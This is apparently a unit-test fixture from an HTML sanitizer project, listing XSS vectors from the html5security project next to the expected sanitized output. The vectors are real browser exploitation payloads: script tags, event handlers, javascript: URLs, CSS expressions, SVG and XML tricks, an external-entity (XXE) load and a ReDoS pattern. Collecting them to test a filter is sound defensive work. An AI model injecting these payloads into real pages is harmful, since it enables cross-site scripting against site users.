parser/xml/test/unit/results.js

Wed, 31 Dec 2014 13:27:57 +0100

author
Michael Schloh von Bennewitz <michael@schloh.com>
date
Wed, 31 Dec 2014 13:27:57 +0100
branch
TOR_BUG_3246
changeset 6
8bccb770b82d
permissions
-rw-r--r--

Ignore runtime configuration files generated during quality assurance.

     1 // vectors by the html5security project (https://code.google.com/p/html5security/, licensed Creative Commons 3.0 BY); see CC-BY-LICENSE for the full license text. Each entry pairs a raw input ("data") with the expected sanitizer output ("sanitized").
     3 var vectors = [
     4   {
     5     "data": "<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>",
     6     "sanitized": "<html><head></head><body></body></html>"
     7   },
     8   {
     9     "data": "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi",
    10     "sanitized": "<html><head></head><body>&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi</body></html>"
    11   },
    12   {
    13     "data": "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>",
    14     "sanitized": "<html><head></head><body>&amp;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;</body></html>"
    15   },
    16   {
    17     "data": "0?<script>Worker(\"#\").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))",
    18     "sanitized": "<html><head></head><body>0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>"
    19   },
    20   {
    21     "data": "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>",
    22     "sanitized": "<html><head></head><body></body></html>"
    23   },
    24   {
    25     "data": "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>",
    26     "sanitized": "<html><head></head><body></body></html>"
    27   },
    28   {
    29     "data": "<input onfocus=write(1) autofocus>",
    30     "sanitized": "<html><head></head><body></body></html>"
    31   },
    32   {
    33     "data": "<input onblur=write(1) autofocus><input autofocus>",
    34     "sanitized": "<html><head></head><body></body></html>"
    35   },
    36   {
    37     "data": "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>",
    38     "sanitized": "<html><head></head><body><a>X</a></body></html>"
    39   },
    40   {
    41     "data": "<video poster=javascript:alert(1)//></video>",
    42     "sanitized": "<html><head></head><body><video controls=\"controls\" poster=\"javascript:alert(1)//\"></video></body></html>"
    43   },
    44   {
    45     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>",
    46     "sanitized": "<html><head></head><body></body></html>"
    47   },
    48   {
    49     "data": "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>",
    50     "sanitized": "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>"
    51   },
    52   {
    53     "data": "<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>",
    54     "sanitized": "<html><head></head><body>01</body></html>"
    55   },
    56   {
    57     "data": "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>",
    58     "sanitized": "<html><head></head><body></body></html>"
    59   },
    60   {
    61     "data": "<script>({0:#0=alert/#0#/#0#(0)})</script>",
    62     "sanitized": "<html><head></head><body></body></html>"
    63   },
    64   {
    65     "data": "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >",
    66     "sanitized": "<html><head></head><body>X</body></html>"
    67   },
    68   {
    69     "data": "<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>",
    70     "sanitized": "<html><head></head><body></body></html>"
    71   },
    72   {
    73     "data": "<script xmlns=\"http://www.w3.org/1999/xhtml\">&#x61;l&#x65;rt&#40;1)</script>",
    74     "sanitized": "<html><head></head><body></body></html>"
    75   },
    76   {
    77     "data": "<meta charset=\"x-mac-farsi\">�script �alert(1)//�/script �",
    78     "sanitized": "<html><head></head><body>�script �alert(1)//�/script �</body></html>"
    79   },
    80   {
    81     "data": "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>",
    82     "sanitized": "<html><head></head><body></body></html>"
    83   },
    84   {
    85     "data": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>",
    86     "sanitized": "<html><head></head><body></body></html>"
    87   },
    88   {
    89     "data": "<input onblur=focus() autofocus><input>",
    90     "sanitized": "<html><head></head><body></body></html>"
    91   },
    92   {
    93     "data": "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>",
    94     "sanitized": "<html><head></head><body></body></html>"
    95   },
    96   {
    97     "data": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>",
    98     "sanitized": "<html><head></head><body>1</body></html>"
    99   },
   100   {
   101     "data": "<script src=\"#\">{alert(1)}</script>;1",
   102     "sanitized": "<html><head></head><body>;1</body></html>"
   103   },
   104   {
   105     "data": "+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);",
   106     "sanitized": "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>"
   107   },
   108   {
   109     "data": "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>",
   110     "sanitized": "<html><head></head><body></body></html>"
   111   },
   112   {
   113     "data": "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>",
   114     "sanitized": "<html><head></head><body>1</body></html>"
   115   },
   116   {
   117     "data": "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d",
   118     "sanitized": "<html><head></head><body></body></html>"
   119   },
   120   {
   121     "data": "<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>",
   122     "sanitized": "<html><head></head><body></body></html>"
   123   },
   124   {
   125     "data": "<frameset onload=alert(1)>",
   126     "sanitized": "<html><head></head></html>"
   127   },
   128   {
   129     "data": "<table background=\"javascript:alert(1)\"></table>",
   130     "sanitized": "<html><head></head><body><table></table></body></html>"
   131   },
   132   {
   133     "data": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>",
   134     "sanitized": "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>"
   135   },
   136   {
   137     "data": "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>",
   138     "sanitized": "<html><head></head><body>1</body></html>"
   139   },
   140   {
   141     "data": "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>",
   142     "sanitized": "<html><head></head><body>1<a></a></body></html>"
   143   },
   144   {
   145     "data": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>",
   146     "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
   147   },
   148   {
   149     "data": "<!--<img src=\"--><img src=x onerror=alert(1)//\">",
   150     "sanitized": "<html><head></head><body><img></body></html>"
   151   },
   152   {
   153     "data": "<comment><img src=\"</comment><img src=x onerror=alert(1)//\">",
   154     "sanitized": "<html><head></head><body><img></body></html>"
   155   },
   156   {
   157     "data": "<!-- up to Opera 11.52, FF 3.6.28 -->\r\n<![><img src=\"]><img src=x onerror=alert(1)//\">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  -->\r\n<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>",
   158     "sanitized": "<html><head></head><body><img>\n\n\n&gt;&lt;image xlink:href=\"<img></body></html>"
   159   },
   160   {
   161     "data": "<style><img src=\"</style><img src=x onerror=alert(1)//\">",
   162     "sanitized": "<html><head></head><body><img></body></html>"
   163   },
   164   {
   165     "data": "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>",
   166     "sanitized": "<html><head></head><body><li></li>\n<div></div></body></html>"
   167   },
   168   {
   169     "data": "<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//#\">XXX</a></body>",
   170     "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
   171   },
   172   {
   173     "data": "<?xml version=\"1.0\" standalone=\"no\"?>\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<style type=\"text/css\">\r\n@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>",
   174     "sanitized": "<html><head>\n\n</head>\n<body>Hello\n</body></html>"
   175   },
   176   {
   177     "data": "<style>*[{}@import'test.css?]{color: green;}</style>X",
   178     "sanitized": "<html><head></head><body>X</body></html>"
   179   },
   180   {
   181     "data": "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>",
   182     "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
   183   },
   184   {
   185     "data": "<div style=\"font-family:foo}color=red;\">XXX</div>",
   186     "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
   187   },
   188   {
   189     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>",
   190     "sanitized": "<html><head></head><body></body></html>"
   191   },
   192   {
   193     "data": "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>",
   194     "sanitized": "<html><head></head><body></body></html>"
   195   },
   196   {
   197     "data": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>",
   198     "sanitized": "<html><head></head><body></body></html>"
   199   },
   200   {
   201     "data": "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>",
   202     "sanitized": "<html><head></head><body></body></html>"
   203   },
   204   {
   205     "data": "<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>",
   206     "sanitized": "<html><head></head><body></body></html>"
   207   },
   208   {
   209     "data": "<x style=\"behavior:url(test.sct)\">",
   210     "sanitized": "<html><head></head><body></body></html>"
   211   },
   212   {
   213     "data": "<xml id=\"xss\" src=\"test.htc\"></xml>\r\n<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>",
   214     "sanitized": "<html><head></head><body>\n<label></label></body></html>"
   215   },
   216   {
   217     "data": "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>",
   218     "sanitized": "<html><head></head><body></body></html>"
   219   },
   220   {
   221     "data": "<video><source onerror=\"alert(1)\">",
   222     "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>"
   223   },
   224   {
   225     "data": "<video onerror=\"alert(1)\"><source></source></video>",
   226     "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>"
   227   },
   228   {
   229     "data": "<b <script>alert(1)//</script>0</script></b>",
   230     "sanitized": "<html><head></head><body><b>alert(1)//0</b></body></html>"
   231   },
   232   {
   233     "data": "<b><script<b></b><alert(1)</script </b></b>",
   234     "sanitized": "<html><head></head><body><b></b></body></html>"
   235   },
   236   {
   237     "data": "<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>",
   238     "sanitized": "<html><head></head><body><div id=\"div1\"></div> <div id=\"div2\"></div></body></html>"
   239   },
   240   {
   241     "data": "<div style=\"[a]color[b]:[c]red\">XXX</div>",
   242     "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
   243   },
   244   {
   245     "data": "<div  style=\"\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;\">XXX</div>",
   246     "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
   247   },
   248   {
   249     "data": "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>",
   250     "sanitized": "<html><head></head><body>\n\n\n\n</body></html>"
   251   },
   252   {
   253     "data": "<embed src=\"javascript:alert(1)\"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src=\"javascript:alert(2)\">\r\n<image src=\"javascript:alert(2)\"> // IE6, O10.10�, OM10.0�\r\n<script src=\"javascript:alert(3)\"></script> // IE6, O11.01�, OM10.1�",
   254     "sanitized": "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>"
   255   },
   256   {
   257     "data": "<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>",
   258     "sanitized": "<!DOCTYPE x[<!entity>\n<html><head></head><body>]&gt;&amp;x;</body></html>"
   259   },
   260   {
   261     "data": "<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>",
   262     "sanitized": "<html><head></head><body></body></html>"
   263   },
   264   {
   265     "data": "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>",
   266     "sanitized": "<html><head></head><body></body></html>"
   267   },
   268   {
   269     "data": "<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"\r\n onerror CDATA \"alert(1)\"\r\n onload CDATA \"alert(2)\">\r\n]><img />",
   270     "sanitized": "<!DOCTYPE x>\n<html><head></head><body>]&gt;<img></body></html>"
   271   },
   272   {
   273     "data": "<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\r\n\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x>\r\n</doc>",
   274     "sanitized": "<html><head></head><body>\n\tXXX\n</body></html>"
   275   },
   276   {
   277     "data": "<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>",
   278     "sanitized": "<html><head></head><body></body></html>"
   279   },
   280   {
   281     "data": "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>",
   282     "sanitized": "<html><head></head><body><div>x</div></body></html>"
   283   },
   284   {
   285     "data": "<// style=x:expression\\28write(1)\\29>",
   286     "sanitized": "<html><head></head><body></body></html>"
   287   },
   288   {
   289     "data": "<form><button formaction=\"javascript:alert(1)\">X</button>",
   290     "sanitized": "<html><head></head><body></body></html>"
   291   },
   292   {
   293     "data": "<event-source src=\"event.php\" onload=\"alert(1)\">",
   294     "sanitized": "<html><head></head><body></body></html>"
   295   },
   296   {
   297     "data": "<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>",
   298     "sanitized": "<html><head></head><body><a></a></body></html>"
   299   },
   300   {
   301     "data": "<script<{alert(1)}/></script </>",
   302     "sanitized": "<html><head></head><body></body></html>"
   303   },
   304   {
   305     "data": "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>",
   306     "sanitized": "<!DOCTYPE x SYSTEM \"test.dtd\">\n<html><head></head><body>&amp;x;</body></html>"
   307   },
   308   {
   309     "data": "<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>",
   310     "sanitized": "<html><head></head><body></body></html>"
   311   },
   312   {
   313     "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>",
   314     "sanitized": "<html><head></head><body><img></body></html>"
   315   },
   316   {
   317     "data": "<object allowscriptaccess=\"always\" data=\"test.swf\"></object>",
   318     "sanitized": "<html><head></head><body></body></html>"
   319   },
   320   {
   321     "data": "<style>*{x:EXPRESSION(write(1))}</style>",
   322     "sanitized": "<html><head></head><body></body></html>"
   323   },
   324   {
   325     "data": "<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>",
   326     "sanitized": "<html><head></head><body></body></html>"
   327   },
   328   {
   329     "data": "<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>",
   330     "sanitized": "<html><head></head><body></body></html>"
   331   },
   332   {
   333     "data": "<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\"  x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>",
   334     "sanitized": "<html><head></head><body></body></html>"
   335   },
   336   {
   337     "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>",
   338     "sanitized": "<html><head></head><body></body></html>"
   339   },
   340   {
   341     "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>",
   342     "sanitized": "<html><head></head><body></body></html>"
   343   },
   344   {
   345     "data": "<body oninput=alert(1)><input autofocus>",
   346     "sanitized": "<html><head></head><body></body></html>"
   347   },
   348   {
   349     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a>\n</svg>",
   350     "sanitized": "<html><head></head><body>\n\n</body></html>"
   351   },
   352   {
   353     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n\n<animation xlink:href=\"javascript:alert(1)\"/>\n<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<foreignObject xlink:href=\"javascript:alert(1)\"/>\n<foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/>\n\n</svg>",
   354     "sanitized": "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>"
   355   },
   356   {
   357     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<set attributeName=\"onmouseover\" to=\"alert(1)\"/>\n<animate attributeName=\"onunload\" to=\"alert(1)\"/>\n</svg>",
   358     "sanitized": "<html><head></head><body>\n\n\n</body></html>"
   359   },
   360   {
   361     "data": "<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style=\"background:url(test5.svg)\">PRESS ENTER</div>",
   362     "sanitized": "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>"
   363   },
   364   {
   365     "data": "[A]\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n[B]\n<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n[C]\n<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">\n[D]\n<% foo><x foo=\"%><script>alert(1)</script>\">",
   366     "sanitized": "<html><head></head><body>[A]\n\"&gt;\n\"&gt;\n\"&gt;\n[B]\n\"&gt;\n[C]\n\n[D]\n&lt;% foo&gt;</body></html>"
   367   },
   368   {
   369     "data": "<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>",
   370     "sanitized": "<html><head></head><body><div>X</div></body></html>"
   371   },
   372   {
   373     "data": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>",
   374     "sanitized": "<html><head></head><body><div>X</div></body></html>"
   375   },
   376   {
   377     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler>\n</svg>",
   378     "sanitized": "<html><head></head><body>\nalert(1)\n</body></html>"
   379   },
   380   {
   381     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<feImage>\n<set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>\n</feImage>\n</svg>",
   382     "sanitized": "<html><head></head><body>\n\n\n\n</body></html>"
   383   },
   384   {
   385     "data": "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>",
   386     "sanitized": "<html><head></head><body>\n</body></html>"
   387   },
   388   {
   389     "data": "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>",
   390     "sanitized": "<html><head></head><body><div id=\"d\"></div>\n\n\n\n<div id=\"d\"></div>\n</body></html>"
   391   },
   392   {
   393     "data": "<div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>\n<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>",
   394     "sanitized": "<html><head></head><body><div id=\"d\"><div>X</div></div>\n</body></html>"
   395   },
   396   {
   397     "data": "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red}   /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>",
   398     "sanitized": "<html><head></head><body>XXX</body></html>"
   399   },
   400   {
   401     "data": "<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">",
   402     "sanitized": "<html><head></head><body></body></html>"
   403   },
   404   {
   405     "data": "<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>",
   406     "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
   407   },
   408   {
   409     "data": "<img src=\"x` `<script>alert(1)</script>\"` `>",
   410     "sanitized": "<html><head></head><body><img></body></html>"
   411   },
   412   {
   413     "data": "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>",
   414     "sanitized": "<html><head></head><body></body></html>"
   415   },
   416   {
   417     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">\r\n<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>\r\n</svg>",
   418     "sanitized": "<html><head></head><body>\n\n</body></html>"
   419   },
   420   {
   421     "data": "<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>",
   422     "sanitized": "<html><head></head><body></body></html>"
   423   },
   424   {
   425     "data": "<img src onerror /\" '\"= alt=alert(1)//\">",
   426     "sanitized": "<html><head></head><body><img></body></html>"
   427   },
   428   {
   429     "data": "<title onpropertychange=alert(1)></title><title title=></title>",
   430     "sanitized": "<html><head><title></title><title title=\"\"></title></head><body></body></html>"
   431   },
   432   {
   433     "data": "<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">\r\n<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">",
   434     "sanitized": "<html><head></head><body><a href=\"http://foo.bar/#x=%60y\"></a><img alt=\"`&gt;&lt;img src=xx:x onerror=alert(1)&gt;&lt;/a&gt;\">\n\n\n<img alt=\"`&gt;&lt;img src=xx:x onerror=alert(2)//\">\n<img alt=\"`&gt;&lt;img src=xx:x onerror=alert(3)//\"></body></html>"
   435   },
   436   {
   437     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>\n<rect  fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>\n</svg>",
   438     "sanitized": "<html><head></head><body>\n\n\n</body></html>"
   439   },
   440   {
   441     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>\r\n</svg>",
   442     "sanitized": "<html><head></head><body>\n\n</body></html>"
   443   },
   444   {
   445     "data": "<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>",
   446     "sanitized": "<html><head></head><body><div>X</div></body></html>"
   447   },
   448   {
   449     "data": "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>",
   450     "sanitized": "<html><head></head><body><div>X</div></body></html>"
   451   },
   452   {
   453     "data": "<div id=\"x\">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>",
   454     "sanitized": "<html><head></head><body><div id=\"x\">XXX</div>\n</body></html>"
   455   },
   456   {
   457     "data": "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>",
   458     "sanitized": "<html><head></head><body>XXX</body></html>"
   459   },
   460   {
   461     "data": "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->",
   462     "sanitized": "<html><head></head><body></body></html>"
   463   },
   464   {
   465     "data": "<div id=\"x\">x</div>\n<xml:namespace prefix=\"t\">\n<import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;\">",
   466     "sanitized": "<html><head></head><body><div id=\"x\">x</div>\n\n\n</body></html>"
   467   },
   468   {
   469     "data": "<a href=\"http://attacker.org\">\n\t<iframe src=\"http://example.org/\"></iframe>\n</a>",
   470     "sanitized": "<html><head></head><body><a href=\"http://attacker.org\">\n\t\n</a></body></html>"
   471   },
   472   {
   473     "data": "<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src=\"http://www.example.org/dropHere.html\"></iframe>",
   474     "sanitized": "<html><head></head><body><div draggable=\"true\">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>"
   475   },
   476   {
   477     "data": "<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>",
   478     "sanitized": "<html><head></head><body>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea></body></html>"
   479   },
   480   {
   481     "data": "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) {\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>",
   482     "sanitized": "<html><head>\n\n</head><body>\n<a>Spam</a></body></html>"
   483   },
   484   {
